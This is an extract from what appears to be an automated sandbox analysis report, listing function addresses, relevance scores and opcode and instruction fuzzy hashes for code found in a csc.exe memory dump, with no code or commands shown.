                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_5c30000_csc.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                  • Opcode ID: fd495d23eeedd11206de172a2501759d6357fde5983cb81cb17d3de9631e434f
                                                                                                                                                                                                                                                                                  • Instruction ID: 0359c7a069a3823f4d486b538eae445b1d5f5f92573ce937edc5e5aadbdd7440
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: fd495d23eeedd11206de172a2501759d6357fde5983cb81cb17d3de9631e434f
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E431F9B56003008BD721AF18C845BB977B5FF41318F4889A9D9479F341DA74EA85DFA1
                                                                                                                                                                                                                                                                                  Function 05C944A8 Relevance: .1, Instructions: 87COMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.6907354046.0000000005C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C30000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_5c30000_csc.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                  • Opcode ID: 2f788e452fe73d534c92f5e9bceb907d933a23c1ad1363216731123cd800826a
                                                                                                                                                                                                                                                                                  • Instruction ID: fd2660941ae9da96fa97168a2b2b8a9751c3755ca46193ede96637f9161deff9
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2f788e452fe73d534c92f5e9bceb907d933a23c1ad1363216731123cd800826a
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 47218275A00604ABCF19DF98C9C8A8ABBA5FF48710F108975ED059B241D7B0EE018B90
                                                                                                                                                                                                                                                                                  Function 05C9D450 Relevance: .1, Instructions: 85COMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.6907354046.0000000005C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C30000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_5c30000_csc.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                  • Opcode ID: 2b5b4eb58bbefcb5805bfaf27a25b006bf847755a79e310f3d4fc50a7abbbd1d
                                                                                                                                                                                                                                                                                  • Instruction ID: f6a5aaef6c720a8554f429b6e314897d573ef82c60fcea2677fa44b95e89f4b0
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2b5b4eb58bbefcb5805bfaf27a25b006bf847755a79e310f3d4fc50a7abbbd1d
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A721F9B2604345ABCB20EF699D49F17BBE9EB44658F400C56FA02D7780DB70D905DBA2
                                                                                                                                                                                                                                                                                  Function 05C63536 Relevance: .1, Instructions: 84COMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.6907354046.0000000005C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C30000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_5c30000_csc.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                  • Opcode ID: d0ff01b2167a06739f0f0e2bafeee257d5810840c6cbc198d1f1a5034423dc58
                                                                                                                                                                                                                                                                                  • Instruction ID: 6457e2beaac670c0646609481fff06a68258fff2d5d8d70e1fc5435468ff5696
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d0ff01b2167a06739f0f0e2bafeee257d5810840c6cbc198d1f1a5034423dc58
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6C21D231205784AFDB21EF19C989F6ABBA5FF80F21F450D19E8424BA51C770EA48DB91
                                                                                                                                                                                                                                                                                  Function 05C99580 Relevance: .1, Instructions: 78COMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.6907354046.0000000005C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C30000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_5c30000_csc.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                  • Opcode ID: 5dd06a5288b94919d15346721c462735091298a4a05bed0a2fc37d51c817c13e
                                                                                                                                                                                                                                                                                  • Instruction ID: 363663b0fc8875b6d1bf25f6f93d5b4a75fd9da2997fa561eecbb582b0f49637
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5dd06a5288b94919d15346721c462735091298a4a05bed0a2fc37d51c817c13e
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 252174302046419BCF39AA25D848F37BBA3BB44220F504F1EE55786AD4DA35EA41DB62
                                                                                                                                                                                                                                                                                  Function 05D3B781 Relevance: .1, Instructions: 77COMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.6907354046.0000000005C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C30000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_5c30000_csc.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                  • Opcode ID: 717c5f7bf5cade1ee75c97bfbb3a9da8e37a616e5c5d2d1754c50e8440789d60
                                                                                                                                                                                                                                                                                  • Instruction ID: 7dbafa8fb6d45f1e22dad1cc306246db94bd4bfce7d312b5b4ff299b1696cce9
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 717c5f7bf5cade1ee75c97bfbb3a9da8e37a616e5c5d2d1754c50e8440789d60
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0921BE76A00215EFEB219F59C889FAABBB5FF45754F058467E8049B210D734DD00CB92
                                                                                                                                                                                                                                                                                  Function 05C82755 Relevance: .1, Instructions: 73COMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.6907354046.0000000005C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C30000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_5c30000_csc.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                  • Opcode ID: 4222e8d6ce4f9e6cc1630d5d7817c04881e374db0cde1fd6d198fda126128135
                                                                                                                                                                                                                                                                                  • Instruction ID: b52f26377aee1083ce07a5b22a80fa575324b98bb56b86db62bbf12fe5189ef0
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4222e8d6ce4f9e6cc1630d5d7817c04881e374db0cde1fd6d198fda126128135
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A6213E35744AC49BE722A729CC5CF343BE6BB01B74F280FE4E9319B6D1D7A899009111
                                                                                                                                                                                                                                                                                  Function 05CE05C6 Relevance: .1, Instructions: 70COMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.6907354046.0000000005C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C30000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_5c30000_csc.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                  • Opcode ID: 5862f5103246f3f139a0b8d8c1927709a2c7965b81705af627bc12d3bd9f4aad
                                                                                                                                                                                                                                                                                  • Instruction ID: bf675ffd2c4c7eb0bd0d15fbb89bbedd1a1228e3a4fa755038ca32834c685e78
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5862f5103246f3f139a0b8d8c1927709a2c7965b81705af627bc12d3bd9f4aad
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6B21E7B1E103099BCB10DFAAD985AAEFBF8FB98710F10056BE915B7250D7B09A41CB54
                                                                                                                                                                                                                                                                                  Function 05C814C9 Relevance: .1, Instructions: 69COMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.6907354046.0000000005C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C30000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_5c30000_csc.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                  • Opcode ID: 6e00257dc14b4a21706c11d80b94c86bd4fe7158da46d6ffa4b94db1d511f37e
                                                                                                                                                                                                                                                                                  • Instruction ID: 7cd51eeecef1128906150238fc69004eff60b4f597310694697023f06d8d3a01
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6e00257dc14b4a21706c11d80b94c86bd4fe7158da46d6ffa4b94db1d511f37e
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D421FD316052988BE722DB99C948F217BEAFF44A44F1D0CE4DC068BA92E734CD81D651
                                                                                                                                                                                                                                                                                  Function 05C5B705 Relevance: .1, Instructions: 69COMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.6907354046.0000000005C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C30000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_5c30000_csc.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                                                                                                                                                  • Opcode ID: 906579a225581609737a426819c5d592fe35b657bafa78c771d3bf41f633e77c
                                                                                                                                                                                                                                                                                  • Instruction ID: 6fd1064557577dfb78d4e138206d8b6dc6a6b391152a968db5e6c586975e60c4
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 906579a225581609737a426819c5d592fe35b657bafa78c771d3bf41f633e77c
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8221BA32200A40DFC726EF68C945F59BBF5FF08718F144E69E00687AA1CB74E941EB88
                                                                                                                                                                                                                                                                                  Function 05C68690 Relevance: .1, Instructions: 68COMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.6907354046.0000000005C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C30000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_5c30000_csc.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                  • Opcode ID: 76ddc64e5941bc4beb6b0342ff4c93ba29962d5ef9743fc46fc248787b55bb0b
                                                                                                                                                                                                                                                                                  • Instruction ID: 707cf3c674bfeec81e7f9123680cc3fecb0949882462ac428ad150b8ec7faea0
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 76ddc64e5941bc4beb6b0342ff4c93ba29962d5ef9743fc46fc248787b55bb0b
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8A11BF757056119B8B11CF49C4C0A2ABBFAFF4A750718846AFD09AF204D6B2EB01C791
                                                                                                                                                                                                                                                                                  Function 05C63640 Relevance: .1, Instructions: 67COMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.6907354046.0000000005C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C30000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_5c30000_csc.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                  • Opcode ID: e9874323b2053fcc41e0ed5190216f148bf86d7b280e1024bc6884d810267118
                                                                                                                                                                                                                                                                                  • Instruction ID: 3a834e52e5a42d58c86194b35186a0b72170e0c77561641aceb9c5bebdebb990
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e9874323b2053fcc41e0ed5190216f148bf86d7b280e1024bc6884d810267118
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FD21C231A002498BEB15DF6DD4887EEB6B4BF88718F298818D813573D0CBB8DB85C750
                                                                                                                                                                                                                                                                                  Function 05C9666D Relevance: .1, Instructions: 65COMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.6907354046.0000000005C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C30000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_5c30000_csc.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                  • Opcode ID: c6aec53e511e6a9dd1158f44ab2ec1290a8f2ef1eadb0c3227f65e3d5511aaef
                                                                                                                                                                                                                                                                                  • Instruction ID: 43a50be01c9317f07477c19f38a16397b13966c95f6cbd31d9fbc6e572b501d3
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c6aec53e511e6a9dd1158f44ab2ec1290a8f2ef1eadb0c3227f65e3d5511aaef
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9F21A975600A40EFCB28CF29C881F62B7F8FB44654F408C2DE69AC7690DB74A980CB60
                                                                                                                                                                                                                                                                                  Function 05C591F0 Relevance: .1, Instructions: 64COMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.6907354046.0000000005C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C30000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_5c30000_csc.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                  • Opcode ID: 58442b4c68580774a45137282047ab0c56383aa2e5270856371211f31a77671f
                                                                                                                                                                                                                                                                                  • Instruction ID: 1acb57ade8b85d3f70ff56431665978a43d464555b0617f95a3cd8e60af2797e
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 58442b4c68580774a45137282047ab0c56383aa2e5270856371211f31a77671f
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 501108BB521640EBD3249F69DA42A75BBF9FB98BD0F500866F80097350DB35CD01C754
                                                                                                                                                                                                                                                                                  Function 05CF6400 Relevance: .1, Instructions: 63COMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.6907354046.0000000005C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C30000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_5c30000_csc.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                  • Opcode ID: 0a18ab3d8f92f74acd5ff99c93810e4bf1af99d810211ce628baf8c30f6bcc2d
                                                                                                                                                                                                                                                                                  • Instruction ID: 776e66baa89631a90f1c8da85c15dcb78ee061c1c5cc3e824f2c2f52f9cd4977
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0a18ab3d8f92f74acd5ff99c93810e4bf1af99d810211ce628baf8c30f6bcc2d
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9311A332380600ABC762EB5DCD44F5ABBA9EB45B64F014825F706DB251DA74E981C794
                                                                                                                                                                                                                                                                                  Function 05C8E7E0 Relevance: .1, Instructions: 63COMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.6907354046.0000000005C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C30000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_5c30000_csc.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                  • Opcode ID: 307d559c3522793ccdc426fd12f637abcfe175603918cd0dc946eb91b60a8b59
                                                                                                                                                                                                                                                                                  • Instruction ID: 0e12e60d6970195fedac7f8b5ffa114860e821986e74087a98752b4294c9233f
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 307d559c3522793ccdc426fd12f637abcfe175603918cd0dc946eb91b60a8b59
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 59110872700100AFDF19E7298C91A7F76ABEBC5774B25492DE9128B391DA70D902C290
                                                                                                                                                                                                                                                                                  Function 05C965D0 Relevance: .1, Instructions: 61COMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.6907354046.0000000005C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C30000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_5c30000_csc.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                  • Opcode ID: 2d5a27bdfcbb9070867e71fe76666023fa7366533d93c007e7e4fbef53c9c394
                                                                                                                                                                                                                                                                                  • Instruction ID: c265ad12dadf9707465f8eb0753aa0818c7610361259bfdded6d339aeb5d931b
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2d5a27bdfcbb9070867e71fe76666023fa7366533d93c007e7e4fbef53c9c394
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9B11BF72A002849BCF28CF59C588E5ABBE9EB94610F01447AE806DB750D730DE40CB94
                                                                                                                                                                                                                                                                                  Function 05D2A464 Relevance: .1, Instructions: 61COMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.6907354046.0000000005C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C30000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_5c30000_csc.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                  • Opcode ID: 17b7fd83732ac97bf948158935cefa8ce054b86e1e540677a9e9fc5c72766afe
                                                                                                                                                                                                                                                                                  • Instruction ID: 0949d812dcf258e6d0bad335a7e1986c6a534708b713fd00517f8cb8887cfafd
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 17b7fd83732ac97bf948158935cefa8ce054b86e1e540677a9e9fc5c72766afe
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1611C432A00929AFDB19CF54CC09B9DF7F6EF84214F04826AEC5697340E671ED51DB90
                                                                                                                                                                                                                                                                                  Function 05C8270D Relevance: .1, Instructions: 58COMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.6907354046.0000000005C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C30000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_5c30000_csc.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                  • Opcode ID: 5787fd6cd4285eccb69e5fb0c7ccf4ed943ddc8918cc666ca4eb52367447307a
                                                                                                                                                                                                                                                                                  • Instruction ID: d3f4d1f981cd0f26087aeda132f3fe6aaf45f0f7784c5d927324d0c4573f2f31
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5787fd6cd4285eccb69e5fb0c7ccf4ed943ddc8918cc666ca4eb52367447307a
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 91012679349A889BE325A66FCC9CF377BDEEF40654F190CA5F9018B650D964DC009261
                                                                                                                                                                                                                                                                                  Function 05C645B0 Relevance: .1, Instructions: 57COMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                  Memory Dump Source
